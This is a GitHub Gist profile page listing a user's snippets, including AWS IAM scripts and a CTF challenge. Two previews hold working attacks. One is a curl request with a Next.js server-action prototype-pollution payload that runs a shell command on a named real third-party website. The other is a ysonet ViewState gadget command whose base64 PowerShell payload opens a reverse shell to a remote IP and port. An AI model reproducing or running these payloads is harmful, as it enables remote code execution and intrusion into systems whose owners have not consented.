Skip to content

Instantly share code, notes, and snippets.

View RajChowdhury240's full-sized avatar
💻
just another learner

Raj Chowdhury RajChowdhury240

💻
just another learner
342 followers · 402 following
  • Confidential
  • $ aws sts get-caller-identity
  • 16:48 (UTC +11:00)
View GitHub Profile
@RajChowdhury240
RajChowdhury240 / fam.py
Created December 12, 2025 18:46
#!/usr/bin/env python3
"""
AWS Multi-Account Credential Report Script
Assumes a role across multiple AWS accounts and retrieves IAM credential reports.
"""
import boto3
import csv
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
@RajChowdhury240
RajChowdhury240 / dope.md
Created December 12, 2025 15:19
image image image image
@RajChowdhury240
RajChowdhury240 / x.md
Created December 8, 2025 15:27
image
@RajChowdhury240
RajChowdhury240 / d.md
Created December 5, 2025 16:44
image 
curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: www.redbullmobile.om' -H $'Next-Action: x' -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad' -H $'Content-Length: 740' \
    --data-binary $'------WebKitFormBoundaryx8jO2oVc6SWP3Sad\x0d\x0aContent-Disposition: form-data; name=\"0\"\x0d\x0a\x0d\x0a{\x0d\x0a  \"then\": \"$1:__proto__:then\",\x0d\x0a  \"status\": \"resolved_model\",\x0d\x0a  \"reason\": -1,\x0d\x0a  \"value\": \"{\\\"then\\\":\\\"$B1337\\\"}\",\x0d\x0a  \"_response\": {\x0d\x0a    \"_prefix\": \"var res=process.mainModule.require(\'child_process\').execSync(\'id\',{\'timeout\':5000}).toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'), {digest:`${res}`});\",\x0d\x0a    \"_chunks\": \"$Q2\",\x0d\x0a    \"_formData\": {\x0d\x0a      \"get\": \"$1:constructor:constructor\"\x0d\x0a    }\x0d\x0a
@RajChowdhury240
RajChowdhury240 / d.txt
Created December 3, 2025 07:32
Cipher Chronicles: The Leaky Dispatch
200
AF2025
0 0
One of our agents sent us this dispatch, but we fear it was intercepted and tampered with. We know it's been encoded to look like nonsense and then encrypted. Our agent's field manual mentions a “Primary” protocol they always use to generate the key. We need you to decrypt the message and recover the flag. We have obtained intelligence indicating that the target is employing double encryption.
Dispatch File: UkJtaG9wdGlob1ZHOFlsOFVpMWlJVmcwMTVLd2ViTzBQcm1mS0FFUA==
@RajChowdhury240
RajChowdhury240 / demo.md
Created December 1, 2025 09:33
@RajChowdhury240
RajChowdhury240 / damn.txt
Created November 28, 2025 01:10
https://builder.aws.com/content/361Z26nfmss45Xnr49sdbSOEiLj/stop-using-aws-configure-just-use-aws-login
@RajChowdhury240
RajChowdhury240 / ba.md
Created November 26, 2025 17:07
image
@RajChowdhury240
RajChowdhury240 / den.txt
Created November 26, 2025 14:22
\ysonet.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMwAwAC4AOAA4ACIALAAxADMAMwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAH
@RajChowdhury240
RajChowdhury240 / rule.py
Created November 25, 2025 13:52
#!/usr/bin/env python3
"""
Pre-commit hook to scan CloudFormation templates for insecure IAM configurations.
Checks for specific IAM actions with Resource "*" without any conditions.
"""
import json
import yaml
import sys
import os